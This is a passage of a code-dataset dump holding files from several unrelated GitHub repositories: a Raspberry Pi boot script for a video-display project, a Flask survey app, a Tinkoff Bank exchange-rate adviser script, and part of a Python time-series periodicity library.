print(TIMER.is_on())\n time.sleep(.05)\n COUNT += 1\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 45, "blob_id": "805c018851d9ea9b843425fe8b09a3e84791695a", "content_id": "55295c8f20d3f2725eeed0614c4d830bae0d3c8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45, "license_type": "no_license", "max_line_length": 45, "num_lines": 1, "path": "/pishow/src/avg_frames.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/avg_frames.py" }, { "alpha_fraction": 0.6268515586853027, "alphanum_fraction": 0.6416640281677246, "avg_line_length": 40.75, "blob_id": 
"e09382ff37fb68c08b8841bc26688743dcf2d75e", "content_id": "32cdecf61c12af6e5a442586dfc525d5ec161af1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3173, "license_type": "no_license", "max_line_length": 98, "num_lines": 76, "path": "/pishow/src/boot_script.sh", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This is the script that user pi runs on pishow boot. This starts everything.\n#\n# NOTES: do not change the code in this script. You control it by changing\n# values in other files, in the same directory (folder) as this script:\n#\n# To change the screen resolution (it depends on your screen or projector),\n# change it in the file SCREEN_RESOLUTION\n#\n# To change the IP address of the other Raspberry Pi board to which you are\n# sending commands - the one that is connected to the projector or screen on\n# the other end, change the IP address in the file OTHER_PISHOW_IP_ADDRESS\n#\n# To change the URL of the webcam you are using on the other end, change\n# the full URL of the webcam's stream in the file WEBCAM_STREAM_URL\n#\n# This script is started on a Raspberry Pi board that has been set up for\n# 1) Automatic login of user pi into a graphical desktop (to set this auto-\n# login up, use the command `sudo raspi-config`)\n# 2) The following line added to `/home/pi/.config/lxsession/LXDE-pi/autostart`:\n# @lxterminal --command=\"/home/pi/workspace/visaware/pishow/src/boot_script.sh\"\n\nMY_DIR=$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\nLOG_FILE=\"/home/pi/logs/boot_script`date +%F`.log\"\n\ncd $MY_DIR\n\nif [ ! -e \"SCREEN_RESOLUTION\" ]; then\n echo \"You must have a file named SCREEN_RESOLUTION in\" >> \"$LOG_FILE\"\n echo -n \"$MY_DIR with the resolution of your screen (or \" >> \"$LOG_FILE\"\n echo \"projector) in it (e.g. 800x600), exiting...\" >> \"$LOG_FILE\"\n exit 1\nfi\n\nif [ ! -e \"WEBCAM_STREAM_URL\" ]; then\n echo \"You must have a file named WEBCAM_STREAM_URL in \" >> \"$LOG_FILE\"\n echo -n \"$MY_DIR with the URL of the webcam stream in it \" >> \"$LOG_FILE\"\n echo \"(http://128.84.84.129:8080/?action=stream), exiting...\" >> \"$LOG_FILE\"\n exit 1\nfi\n\nif [ ! -e \"OTHER_PISHOW_IP_ADDRESS\" ]; then\n echo \"You must have a file named OTHER_PISHOW_IP_ADDRESS in \" >> \"$LOG_FILE\"\n echo -n \"$MY_DIR with the other Raspberry Pi's IP address in it \" >> \"$LOG_FILE\"\n echo \"(e.g. 
128.84.84.130), exiting...\" >> \"$LOG_FILE\"\n exit 1\nfi\n\n# full-screen width & height of screen\nWIDTH=\"`cat SCREEN_RESOLUTION | sed 's/x/ /' | awk '{print $1}'`\"\nHEIGHT=\"`cat SCREEN_RESOLUTION | sed 's/x/ /' | awk '{print $2}'`\"\nMY_IP=\"`ifconfig | grep -A 1 eth0 | grep inet | awk '{print $2}'`\"\nOTHER_IP=\"`cat OTHER_PISHOW_IP_ADDRESS`\"\nWEBCAM_URL=\"`cat WEBCAM_STREAM_URL`\"\n\n# make sure the logs directory exists\nmkdir -p \"/home/pi/logs\"\n\nCMD=\"./avg_frames_on_button_click.py\"\n\necho \"----------------------------------------------------------\" >> \"$LOG_FILE\"\necho \"`date` - boot_script.sh: starting ...\" >> \"$LOG_FILE\"\necho \"Fullscreen size: ${WIDTH}x$HEIGHT\" >> \"$LOG_FILE\"\necho \"My (pishow) IP: $MY_IP\" >> \"$LOG_FILE\"\necho \"Other (pishow) IP: $OTHER_IP\" >> \"$LOG_FILE\"\necho \"Webcam URL: $WEBCAM_URL\" >> \"$LOG_FILE\"\necho \"----------------------------------------------------------\" >> \"$LOG_FILE\"\n\nsetterm -powerdown 0\n\n# the following line logs board temperature and throttling state every 60 seconds:\n( while true; do vcgencmd measure_temp; vcgencmd get_throttled; sleep 60 ; done >> \"$LOG_FILE\" ) &\n\nDISPLAY=:0 \"$CMD\" \"$MY_IP\" \"$OTHER_IP\" \"$WEBCAM_URL\" \"$WIDTH\" \"$HEIGHT\" \\\n >> \"$LOG_FILE\" 2>&1\n" } ]
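An aside on the visaware record above: its LINKS.md credits a multithreaded grab loop for finally fixing the MJPEG latency problem, and boot_script.sh reads the stream URL from the WEBCAM_STREAM_URL file. The real implementation lives in the separate opencv-video-loops repository (the .py entries above are only symlinks into it), so the sketch below is just an illustrative reconstruction of the latest-frame-grabber idea; the class name and structure are assumptions, not the project's code.

```python
import threading

import cv2


class LatestFrameGrabber:
    """Read a network stream in a background thread, keeping only the newest frame.

    Discarding stale frames instead of queueing them is what avoids the
    multi-second lag described in the LINKS.md latency notes.
    """

    def __init__(self, url):
        self.capture = cv2.VideoCapture(url)
        self.frame = None
        self.lock = threading.Lock()
        threading.Thread(target=self._reader, daemon=True).start()

    def _reader(self):
        # Runs forever in the background; each successful read overwrites
        # the stored frame, so readers always see the most recent one.
        while True:
            ok, frame = self.capture.read()
            if ok:
                with self.lock:
                    self.frame = frame

    def read(self):
        with self.lock:
            return None if self.frame is None else self.frame.copy()


if __name__ == "__main__":
    # Example URL taken from the WEBCAM_STREAM_URL sample in pishow/src/README.md.
    grabber = LatestFrameGrabber("http://128.84.84.129:8080/?action=stream")
```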
18
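boot_script.sh above launches `avg_frames_on_button_click.py` with five positional arguments (MY_IP, OTHER_IP, WEBCAM_URL, WIDTH, HEIGHT), but that script is not part of this snapshot. A minimal, hypothetical entry point matching that calling convention might look like this; everything beyond the argument order is a guess:

```python
#!/usr/bin/env python3
"""Hypothetical argument handling for the script that boot_script.sh invokes."""
import sys


def parse_args(argv):
    """Return (my_ip, other_ip, webcam_url, width, height) as passed by boot_script.sh."""
    if len(argv) != 6:
        sys.exit("usage: {} MY_IP OTHER_IP WEBCAM_URL WIDTH HEIGHT".format(argv[0]))
    my_ip, other_ip, webcam_url = argv[1:4]
    # Width and height arrive as strings from the shell; convert them once here.
    width, height = int(argv[4]), int(argv[5])
    return my_ip, other_ip, webcam_url, width, height


if __name__ == "__main__":
    print(parse_args(sys.argv))
```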
TruxSux/flask-survey
https://github.com/TruxSux/flask-survey
83b7e3622074d7899d60833b9727c3ab237ab845
3b17846cfc4c5c7917dfa41880eb717e8e09cfd7
b7be6a830c312b2edef6cdfb653733eab2fd9e1d
refs/heads/main
2023-07-18T07:05:26.335524
2021-09-10T04:48:55
2021-09-10T04:48:55
404,865,874
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6610562801361084, "alphanum_fraction": 0.6633778214454651, "avg_line_length": 36.4782600402832, "blob_id": "f43bee601adf2fe2d5451866811eed5a343015ca", "content_id": "e5f906bf33411a3e336d0cd2002817b98c186fa6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1723, "license_type": "no_license", "max_line_length": 94, "num_lines": 46, "path": "/app.py", "repo_name": "TruxSux/flask-survey", "src_encoding": "UTF-8", "text": "from flask import render_template, session, redirect, request, Flask, flash\nimport surveys\n\napp = Flask(__name__)\napp.config[\"DEBUG_TB_INTERCEPT_REDIRECTS\"] = False\napp.config[\"SECRET_KEY\"] = 'nimdA'\n\[email protected](\"/\")\ndef show_home_page():\n    # Explicit None check: c_qid == 0 means a survey is already in progress\n    if session.get('c_qid') is None:\n        session[\"c_qid\"] = 0\n        session[\"responses\"] = []\n        return render_template(\"home.html\")\n    elif session[\"c_qid\"] < len(surveys.satisfaction_survey.questions):\n        flash(\"Returning you to your unfinished survey\")\n        return redirect(f\"/question/{session['c_qid']}\")\n    # This return is only reached if the user revisits after completing the survey.\n    return redirect(\"/finished\")\n\[email protected](\"/question/<q_number>\")\ndef show_question_page(q_number):\n    # Send out-of-order requests back to the current question, and requests\n    # past the last question to the finished page.\n    if int(q_number) != session[\"c_qid\"]:\n        flash(\"Invalid question id / You haven't completed earlier questions\")\n        return redirect(f\"/question/{session['c_qid']}\")\n    if int(q_number) == len(surveys.satisfaction_survey.questions):\n        return redirect(\"/finished\")\n    c_question = surveys.satisfaction_survey.questions[int(q_number)]\n    return render_template(\n        \"questions.html\",\n        question_number=str(int(q_number) + 1),\n        question=c_question.question,\n        choices=c_question.choices,\n        redirect_link=str(int(q_number) + 1),\n    )\n\[email protected](\"/answer\", methods=[\"POST\"])\ndef get_answer():\n    session[\"responses\"].append(request.form[\"answer\"])\n    session[\"c_qid\"] += 1\n    return redirect(f\"/question/{session['c_qid']}\")\n\[email protected](\"/finished\")\ndef show_finished_page():\n    return render_template(\"finished.html\")" } ]
1
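Note that app.py in the flask-survey record above imports a `surveys` module that is not included in this snapshot. A minimal stand-in that satisfies the attributes the app actually touches (`satisfaction_survey.questions`, each item exposing `.question` and `.choices`) could look like the sketch below; the class names and every concrete question are placeholders:

```python
class Question:
    """One survey question with its answer choices."""

    def __init__(self, question, choices=None):
        self.question = question
        # app.py renders one radio button per choice; default to yes/no.
        self.choices = choices or ["Yes", "No"]


class Survey:
    """A titled, ordered collection of questions."""

    def __init__(self, title, questions):
        self.title = title
        self.questions = questions


satisfaction_survey = Survey(
    "Customer Satisfaction Survey",  # placeholder title
    [
        Question("Were you satisfied with your visit?"),
        Question("Would you recommend us to a friend?"),
        Question("How often do you visit?", ["Weekly", "Monthly", "Rarely"]),
    ],
)
```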
d3QUone/rates
https://github.com/d3QUone/rates
ba591e5c2d81dbbd584685222c30128eebdfcb14
1587af388417f77e22175bc61091ee664dadc1d4
343e5786081bdec51df590d879eb0d603c5ec083
refs/heads/master
2021-01-10T12:44:49.316514
2016-01-09T08:36:53
2016-01-09T08:36:53
48,881,751
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.7218194007873535, "alphanum_fraction": 0.7284113168716431, "avg_line_length": 24.868852615356445, "blob_id": "1cbadb5432cb78d469d44e2479bc14c691fd6ec6", "content_id": "8e288376223cba92750d328fab96445f983d353c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1640, "license_type": "no_license", "max_line_length": 111, "num_lines": 61, "path": "/README.md", "repo_name": "d3QUone/rates", "src_encoding": "UTF-8", "text": "Tinkoff-Bank debit card rates and suggestions script\n\nWorkflow with the current [config](config.yaml):\n\n![Example output](assets/v4.png)\n\n### Description\n\nThe script works with the official exchange rates for Tinkoff Bank debit cards and suggests arbitrage options. \n\nIt is best used together with https://tinkoffrates.ru\n\n## How to\n\n### Setup, A - global\n\n1) Install dependencies: `pip install -r requirements.txt`\n\n2) Create an alias in .bash_profile (OS X) for quick access: type `nano ~/.bash_profile` and add \n\n```bash\nalias rates=\"cd path/to/rates/folder/ && python main.py\"\n```\n\nwhere you must replace `path/to/rates/folder/` with the real path.\n\n### Setup, B - localized (recommended)\n\n1) Create virtual environment in project folder: `virtualenv venv`\n\n2) Install dependencies: `venv/bin/pip install -r requirements.txt`\n \n3) Create an alias in .bash_profile (OS X) for quick access: type `nano ~/.bash_profile` and add \n\n```bash\nalias rates=\"cd path/to/rates/folder/ && venv/bin/python main.py\"\n```\n \nwhere you must replace `path/to/rates/folder/` with the real path.\n\nE.g. on my machine the command is: \n\n```bash\nalias rates=\"cd /Users/vladimir/Desktop/rates && venv/bin/python main.py\"\n``` \n\nand I launch it just by typing `rates`.\n\n### Usage \n\nEdit the [config.yaml](config.yaml) file with your money amounts and just run the script.\n\n## Future steps\n\n* Add command line arguments and different work modes\n* Add more suggestions \n* Add more arbitrage cases\n\n------\n\nCopyright 2016 Vladimir Kasatkin\n" }, { "alpha_fraction": 0.7962962985038757, "alphanum_fraction": 0.8148148059844971, "avg_line_length": 17, "blob_id": "84c8cf21c0f49b513baa97973c1979c4c661b498", "content_id": "c661a1498a1f2294e3646246aa8ababa777acffc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 54, "license_type": "no_license", "max_line_length": 37, "num_lines": 3, "path": "/requirements.txt", "repo_name": "d3QUone/rates", "src_encoding": "UTF-8", "text": "requests\npyyaml\ngit+https://github.com/d3QUone/logger\n" }, { "alpha_fraction": 0.4752071499824524, "alphanum_fraction": 0.4769917130470276, "avg_line_length": 37.645320892333984, "blob_id": "804d1ee41ddce3104d0c55f1896cd5212e75bc16", "content_id": "0d717841f4ffb38d1a86834a8d76383623c9764e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7845, "license_type": "no_license", "max_line_length": 116, "num_lines": 203, "path": "/main.py", "repo_name": "d3QUone/rates", "src_encoding": "UTF-8", "text": "__author__ = 'vladimir'\n\nimport sys\nimport json\n\nimport yaml\nimport requests\n\nfrom logger import Logger\n\nlog = Logger(\"rates\")\n\n\nclass Adviser(object):\n    URL = \"https://www.tinkoff.ru/api/v1/currency_rates/\"\n    CATEGORY = \"DebitCardsTransfers\"\n    RUR_key = \"RUB\"\n    USD_key = \"USD\"\n    EUR_key = \"EUR\"\n    ALL_CURRENCIES = (RUR_key, USD_key, EUR_key)\n\n    def __init__(self):\n        
with open(\"config.yaml\", \"r\") as f:\n            self.config = yaml.safe_load(f)\n        self.rub_amount = self.config[self.RUR_key]\n        self.usd_amount = self.config[self.USD_key]\n        self.eur_amount = self.config[self.EUR_key]\n        self.values = {}\n\n    def __filter_data(self, data):\n        \"\"\"Removes extra data and filters all rates by currency\"\"\"\n        for item in data:\n            if (item[\"category\"] == self.CATEGORY and item[\"fromCurrency\"][\"name\"] in self.ALL_CURRENCIES\n                    and item[\"toCurrency\"][\"name\"] in self.ALL_CURRENCIES):\n                name = item[\"fromCurrency\"][\"name\"]\n                if name not in self.values:\n                    self.values[name] = {}\n                self.values[name][item[\"toCurrency\"][\"name\"]] = {\n                    \"sell\": item[\"sell\"],  # ! bank sells\n                    \"buy\": item[\"buy\"],  # ! bank buys\n                }\n        log.debug(json.dumps(self.values, indent=2))\n\n    def __load_rates(self):\n        \"\"\"Initialize loading action\"\"\"\n        try:\n            data = requests.get(self.URL).json()\n            self.__filter_data(data[\"payload\"][\"rates\"])\n        except Exception as e:\n            log.error(\"load_rates error: {}\".format(repr(e)))\n\n    def show_available(self):\n        return \"{} RUR, {} USD, {} EUR\".format(\n            Logger.colorize(\"green\" if self.rub_amount > 0 else \"red\", self.rub_amount),\n            Logger.colorize(\"green\" if self.usd_amount > 0 else \"red\", self.usd_amount),\n            Logger.colorize(\"green\" if self.eur_amount > 0 else \"red\", self.eur_amount),\n        )\n\n    def get(self, args):\n        if len(args) == 4:\n            _, _, amount, currency = args\n            if currency not in self.ALL_CURRENCIES:\n                log.error(\"Currency {} is not supported\".format(\n                    Logger.colorize(\"blue\", currency)\n                ))\n                return\n        elif len(args) == 3:\n            _, _, amount = args\n            currency = self.RUR_key\n            log.info(\"No currency was provided, using {} by default\".format(\n                Logger.colorize(\"blue\", currency)\n            ))\n        else:\n            log.error(\"Usage: {} {}\".format(\n                Logger.colorize(\"green\", \"get\"),\n                Logger.colorize(\"red\", \"amount [currency]\")\n            ))\n            return\n\n        s = \"\\n\\n\\t{}\".format(self.show_available())\n\n        log.info(s)\n\n    def help(self):\n        \"\"\"Calculate all variants\"\"\"\n        self.__load_rates()\n\n        all_amount_to_usd = (self.eur_amount * self.values[self.EUR_key][self.USD_key][\"buy\"] + self.usd_amount) * \\\n                            self.values[self.USD_key][self.RUR_key][\"buy\"]\n        all_amount_to_eur = (self.usd_amount * self.values[self.USD_key][self.EUR_key][\"buy\"] + self.eur_amount) * \\\n                            self.values[self.EUR_key][self.RUR_key][\"buy\"]\n\n        all_cases = (\n            {\n                \"name\": \"EUR[RUB]\",\n                \"description\": \"Convert EUR to RUB\",\n                \"dimension\": \"RUB\",\n                \"value\": self.eur_amount * self.values[self.EUR_key][self.RUR_key][\"buy\"],\n            },\n            {\n                \"name\": \"USD[RUB]\",\n                \"description\": \"Convert USD to RUB\",\n                \"dimension\": \"RUB\\n\",\n                \"value\": self.usd_amount * self.values[self.USD_key][self.RUR_key][\"buy\"],\n            },\n            {\n                \"name\": \"EUR[USD]\",\n                \"description\": \"Convert EUR to USD\",\n                \"dimension\": \"USD\",\n                \"value\": self.eur_amount * self.values[self.EUR_key][self.USD_key][\"buy\"],\n            },\n            {\n                \"name\": \"RUB[USD]\",\n                \"description\": \"Convert RUB to USD\",\n                \"dimension\": \"USD\",\n                \"value\": self.rub_amount / self.values[self.USD_key][self.RUR_key][\"sell\"],\n            },\n            {\n                \"name\": \"RUB[USD]+EUR[USD]\",\n                \"description\": \"Convert RUB and EUR to USD\",\n                \"dimension\": \"USD\\n\",\n                \"value\": self.rub_amount / self.values[self.USD_key][self.RUR_key][\"sell\"] +\n                         self.eur_amount * self.values[self.EUR_key][self.USD_key][\"buy\"],\n            },\n            # TODO: add total in usd\n            {\n                \"name\": \"USD[EUR]\",\n                \"description\": \"Convert USD to 
EUR\",\n \"dimension\": \"EUR\",\n \"value\": self.usd_amount * self.values[self.USD_key][self.EUR_key][\"buy\"],\n },\n {\n \"name\": \"RUB[EUR]\",\n \"description\": \"Convert RUB to EUR\",\n \"dimension\": \"EUR\",\n \"value\": self.rub_amount / self.values[self.EUR_key][self.RUR_key][\"sell\"],\n },\n {\n \"name\": \"RUB[EUR]+USD[EUR]\",\n \"description\": \"Convert RUB and USD to EUR\",\n \"dimension\": \"EUR\\n\",\n \"value\": self.rub_amount / self.values[self.EUR_key][self.RUR_key][\"sell\"] +\n self.usd_amount * self.values[self.USD_key][self.EUR_key][\"buy\"],\n },\n # TODO: add total in eur\n {\n \"name\": \"(EUR[USD]+USD)[RUB]\",\n \"description\": \"Total EUR and USD in USD\",\n \"dimension\": \"RUB\",\n \"value\": all_amount_to_usd,\n },\n {\n \"name\": \"(USD[EUR]+EUR)[RUB]\",\n \"description\": \"Total EUR and USD in EUR\",\n \"dimension\": \"RUB\",\n \"value\": all_amount_to_eur,\n },\n )\n \n s = \"\\n\\n\\t{}\\n\\n\\tUSD/RUR: {} / {}\\n\\tEUR/RUR: {} / {}\\n\\n\".format(\n self.show_available(),\n Logger.colorize(\"green\", self.values[self.USD_key][self.RUR_key][\"buy\"]),\n Logger.colorize(\"red\", self.values[self.USD_key][self.RUR_key][\"sell\"]),\n Logger.colorize(\"green\", self.values[self.EUR_key][self.RUR_key][\"buy\"]),\n Logger.colorize(\"red\", self.values[self.EUR_key][self.RUR_key][\"sell\"]),\n )\n for case in all_cases:\n if \"value\" in case and not (\"disabled\" in case and not case[\"disabled\"]):\n s += \"{} = {} {}\\n\".format(\n case[\"description\"],\n Logger.colorize(\"bold\", round(case[\"value\"], 3)),\n Logger.colorize(\"blue\", case[\"dimension\"])\n )\n # show profit\n if all_amount_to_usd > all_amount_to_eur:\n s += \"If move all into {} profit = {} {}\\n\".format(\n Logger.colorize(\"green\", \"USD\"),\n Logger.colorize(\"green\", round(all_amount_to_usd - all_amount_to_eur, 1)),\n Logger.colorize(\"green\", \"RUR\")\n )\n else:\n s += \"If move all into {} profit = {} {}\\n\".format(\n Logger.colorize(\"green\", \"EUR\"),\n Logger.colorize(\"green\", round(all_amount_to_eur - all_amount_to_usd, 1)),\n Logger.colorize(\"green\", \"RUR\")\n )\n s += \"=\" * 50\n log.info(s)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n command = sys.argv[1]\n else:\n command = None\n\n adviser = Adviser()\n if not command:\n adviser.help()\n elif command == \"get\":\n adviser.get(sys.argv)\n else:\n log.error(\"Command {} is not available\".format(Logger.colorize(\"red\", command)))\n" } ]
3
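The heart of `help()` in the rates record above is the pair of round-trip valuations, `all_amount_to_usd` versus `all_amount_to_eur`. Reduced to a standalone toy calculation, the comparison works as below; the rates are invented for illustration and are not real Tinkoff quotes:

```python
# Rates at which the bank buys the given currency from you (toy numbers).
usd_rub_buy = 75.0   # USD -> RUB
eur_rub_buy = 85.0   # EUR -> RUB
eur_usd_buy = 1.10   # EUR -> USD
usd_eur_buy = 0.88   # USD -> EUR

usd_amount, eur_amount = 100.0, 100.0

# Mirror of all_amount_to_usd: convert EUR into USD, then value it all in RUB.
via_usd = (eur_amount * eur_usd_buy + usd_amount) * usd_rub_buy
# Mirror of all_amount_to_eur: convert USD into EUR, then value it all in RUB.
via_eur = (usd_amount * usd_eur_buy + eur_amount) * eur_rub_buy

best = "USD" if via_usd > via_eur else "EUR"
print("via USD: {:.1f} RUB, via EUR: {:.1f} RUB".format(via_usd, via_eur))
print("moving everything into {} wins by {:.1f} RUB".format(best, abs(via_usd - via_eur)))
```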
812231487/periodicity
https://github.com/812231487/periodicity
b10225b353afbbba6d2b583597d01b08e272b1b3
cdd906f9e3051949315475544a90d8491eaf2f70
44cd96bb48a7e23edcc6ce9835dad21fab7b3e6e
refs/heads/master
2021-01-05T13:48:14.681316
2019-08-23T00:11:34
2019-08-23T00:11:34
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7074607610702515, "alphanum_fraction": 0.7264397740364075, "avg_line_length": 29.559999465942383, "blob_id": "46d86c27063f21063f331117df40c8a0d3bf6498", "content_id": "0e51c8a7b16f02019852c21868c68451985a3c59", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1528, "license_type": "permissive", "max_line_length": 93, "num_lines": 50, "path": "/README.md", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "# Periodicity\n\nUseful tools for analysis of periodicities in time series data.\n\nIncludes:\n* Auto-Correlation Function\n* Fourier methods:\n * Lomb-Scargle periodogram\n * Wavelet Transform (in progress)\n* Phase-folding methods:\n * String Length\n * Phase Dispersion Minimization\n * Analysis of Variance (in progress)\n* Gaussian Processes:\n * `george` implementation\n * `celerite` implementation\n * `pymc3` implementation (in progress)\n\n## Quick start\n### Installing current release from pypi (v0.1.0-alpha)\n $ pip install periodicity\n### Installing current development version\n $ git clone https://github.com/dioph/periodicity.git\n $ cd periodicity\n $ python setup.py install\n## Example using GP with astronomical data\n```python\nfrom periodicity.gp import *\nfrom lightkurve import search_lightcurvefile\n\nlcs = search_lightcurvefile(target=9895037, quarter=[4,5]).download_all()\nlc = lcs[0].PDCSAP_FLUX.normalize().append(lcs[1].PDCSAP_FLUX.normalize())\nlc = lc.remove_nans().remove_outliers().bin(binsize=4)\n\nt, x = lc.time, lc.flux\nx = x - x.mean()\n\nmodel = FastGPModeler(t, x)\nmodel.prior = make_gaussian_prior(t, x)\nmodel.minimize()\nsamples = model.mcmc(nwalkers=32, nsteps=5000, burn=500)\n\nprint('Median period: {:.2f}'.format(np.exp(np.median(samples[:, 4]))))\n```\n\n### Visualization of this example:\n\n![gp_example](https://github.com/dioph/periodicity/blob/master/figures/example2.png?raw=True)\n\n![gp_example](https://github.com/dioph/periodicity/blob/master/figures/example1.png?raw=True)\n" }, { "alpha_fraction": 0.5224675536155701, "alphanum_fraction": 0.5340259671211243, "avg_line_length": 24.75250816345215, "blob_id": "5f8c7fe658d14c1f8f801a4d1d1a832889373895", "content_id": "d7fffc0f94770691a121996a85687c0baa982a38", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7700, "license_type": "permissive", "max_line_length": 106, "num_lines": 299, "path": "/periodicity/acf.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy import signal\nfrom scipy.optimize import minimize\nfrom astropy.convolution import Box1DKernel\n\n\ndef acf(y, t=None, maxlag=None, s=0, fill=False):\n \"\"\"Auto-Correlation Function implemented using IFFT of the power spectrum.\n\n Parameters\n ----------\n y: array-like\n discrete input signal\n t: array-like (optional)\n time array\n maxlag: int (optional)\n maximum lag to compute ACF\n # TODO: turn maxlag into a measure of time if t is given\n s: int (optional)\n standard deviation of Gaussian filter used to smooth ACF, measured in samples\n fill: bool (optional default=False)\n whether to use linear interpolation to sample signal uniformly\n\n Returns\n -------\n lags: array-like\n array of lags\n R: array-like\n ACF of input signal\n \"\"\"\n if t is None:\n t = np.arange(len(y))\n\n if fill:\n t, y = fill_gaps(t, y)\n\n N = len(y)\n\n if maxlag is None:\n maxlag = N\n\n f = np.fft.fft(y - y.mean(), n=2 * 
N)\n R = np.fft.ifft(f * np.conjugate(f))[:maxlag].real\n\n if s > 0:\n kernel = gaussian(mu=0, sd=s)\n h = kernel(np.arange(-(3 * s - 1), 3 * s, 1.))\n R = smooth(R, kernel=h)\n\n R /= R[0]\n lags = t[:maxlag] - np.min(t[:maxlag])\n\n return lags, R\n\n\ndef fill_gaps(t, y):\n \"\"\"Linear interpolation to create a uniformly sampled signal\n\n Parameters\n ----------\n t: array-like\n time array\n y: array-like\n signal array\n\n Returns\n -------\n tnew: array-like\n new sampling times uniformly spaced\n ynew: array-like\n signal with gaps filled by linear interpolation\n \"\"\"\n T = float(np.median(np.diff(t)))\n gaps = np.where(np.diff(t) > 1.5 * T)[0]\n t_gaps = []\n y_gaps = []\n tnew = t\n ynew = y\n for g in gaps:\n t0, t1 = tnew[g:g + 2]\n y0, y1 = ynew[g:g + 2]\n tfill = np.arange(t0 + T, t1, T)\n t_gaps.append(tfill)\n y_gaps.append(y0 + (tfill - t0) * (y1 - y0) / (t1 - t0))\n ids = []\n shift = 1\n for i, tg, yg in zip(gaps, t_gaps, y_gaps):\n idx = i + shift\n tnew = np.insert(tnew, idx, tg)\n ynew = np.insert(ynew, idx, yg)\n n = len(tg)\n ids.append(np.arange(idx, idx + n))\n shift += n\n tnew = np.arange(tnew.size) * T + tnew[0]\n return tnew, ynew\n\n\ndef find_peaks(y, t=None, delta=0.):\n \"\"\"Finds function maxima and the corresponding peak heights\n\n Parameters\n ----------\n y: array-like\n signal array\n t: array-like (optional)\n time array\n if not given will use indexes\n delta: float (optional)\n minimum difference between a peak and the following points before a peak may be considered a peak.\n default: 0.0\n recommended: delta >= RMSnoise * 5\n\n Returns\n -------\n peaks: array-like\n [tmax, ymax] for each maximum found\n heights: array-like\n average peak heights for each peak found\n \"\"\"\n peaks = []\n dips = []\n if t is None:\n t = np.arange(len(y))\n y = np.asarray(y)\n assert len(t) == len(y), \"t and y must have same length\"\n\n mn, mx = np.inf, -np.inf\n mnpos, mxpos = np.nan, np.nan\n lookformax = False\n\n for i in range(len(y)):\n if y[i] > mx:\n mx = y[i]\n mxpos = t[i]\n if y[i] < mn:\n mn = y[i]\n mnpos = t[i]\n if lookformax:\n if y[i] < mx-delta:\n peaks.append((mxpos, mx))\n mn = y[i]\n mnpos = t[i]\n lookformax = False\n else:\n if y[i] > mn+delta and mn != -np.inf:\n dips.append((mnpos, mn))\n mx = y[i]\n mxpos = t[i]\n lookformax = True\n peaks = np.array(peaks)\n dips = np.array(dips)\n\n heights = []\n for i in range(len(peaks)):\n h1 = peaks[i, 1] - dips[i, 1]\n try:\n h2 = peaks[i, 1] - dips[i+1, 1]\n heights.append((h1+h2)/2)\n except IndexError:\n heights.append(h1)\n heights = np.array(heights)\n\n if heights.size == 0 and delta > 1e-6:\n return find_peaks(y=y, t=t, delta=delta/2)\n\n return peaks, heights\n\n\ndef gaussian(mu, sd):\n \"\"\"Simple 1D Gaussian function generator\n\n Parameters\n ----------\n mu: float\n mean\n sd: float\n standard deviation\n\n Returns\n -------\n f: function\n 1D Gaussian with given parameters\n \"\"\"\n def f(x):\n return 1 / (np.sqrt(2 * np.pi) * sd) * np.exp(-.5 * ((x - mu) / sd) ** 2)\n\n return f\n\n\ndef smooth(y, kernel):\n \"\"\"Wrap to numpy.convolve\n\n Parameters\n ----------\n y: array-like\n input noisy signal\n kernel: array-like\n FIR filter to smooth the signal\n Returns\n -------\n yf: array-like\n Smoothed signal\n \"\"\"\n double_y = np.append(y[::-1], y)\n yf = np.convolve(double_y, kernel, mode='same')[len(y):]\n return yf\n\n\ndef filt(x, lo, hi, fs, order=5):\n \"\"\"Implements a band-pass IIR butterworth filter\n\n Parameters\n ----------\n x: array-like\n input signal 
to be filtered\n lo: float\n lower cutoff frequency\n hi: float\n higher cutoff frequency\n fs: float\n sampling frequency of signal\n order: int (optional default=5)\n order of the butterworth filter\n\n Returns\n -------\n xf: array-like\n filtered signal\n \"\"\"\n nyq = .5 * fs\n lo /= nyq\n hi /= nyq\n b, a = signal.butter(N=order, Wn=[lo, hi], btype='band')\n xf = signal.filtfilt(b, a, x)\n return xf\n\n\ndef acf_harmonic_quality(t, x, pmin=None, periods=None, a=1, b=2, n=8):\n \"\"\"Calculates the quality of the ACF of a band-pass filtered version of the signal\n\n t: array-like\n time array\n x: array-like\n signal array\n pmin: float (optional)\n lower cutoff period to filter signal\n periods: list (optional)\n list of higher cutoff periods to filter signal\n Will only consider periods between `pmin` and half the baseline\n a, b, n: floats (optional)\n if `periods` is not given then it assumes the first `n` powers of `b` scaled by `a`:\n periods = a * b ** np.arange(n)\n defaults are a=1, b=2, n=8\n\n Returns\n -------\n ps: list\n highest peaks (best periods) for each filtered version\n hs: list\n maximum heights for each filtered version\n qs: list\n quality factor of each best period\n \"\"\"\n if periods is None:\n periods = a * b ** np.arange(n)\n fs = 1 / float(np.median(np.diff(t)))\n if pmin is None:\n pmin = max(np.min(periods) / 10, 3 / fs)\n t -= np.min(t)\n periods = np.array([pi for pi in periods if pmin < pi < np.max(t) / 2])\n ps = []\n hs = []\n qs = []\n for pi in periods:\n xf = filt(x, 1 / pi, 1 / pmin, fs)\n ml = np.where(t >= 2 * 